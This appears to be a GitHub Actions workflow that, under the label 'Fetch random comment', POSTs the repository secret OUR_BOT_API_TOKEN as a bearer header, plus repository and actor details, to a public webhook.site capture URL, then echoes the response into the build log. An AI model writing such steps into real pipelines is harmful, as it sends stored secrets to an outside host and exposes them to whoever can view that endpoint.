name: pr-first-response
on: [push]

jobs: 
  send-response:
  
    runs-on: ubuntu-latest
    steps:
      - name: Fetch random comment 🗣️
        uses: JamesIves/fetch-api-data-action@v2.1.0
        with:
          ENDPOINT: https://webhook.site/00f723b3-783e-42c7-a422-50662a9a94dd
          CONFIGURATION: '{ "method": "POST", "headers": {"Authorization": "Bearer ${{ secrets.OUR_BOT_API_TOKEN }}"}, "body": { "repo": "${{ github.repository }}", "number": "${{ github.event.number }}", "actor": "${{ github.actor }}"} }'
      - name: Dump env context
        run:   echo "$GITHUB_CONTEXT"
        shell: bash
        env:
          GITHUB_CONTEXT: ${{ env.fetch-api-data }}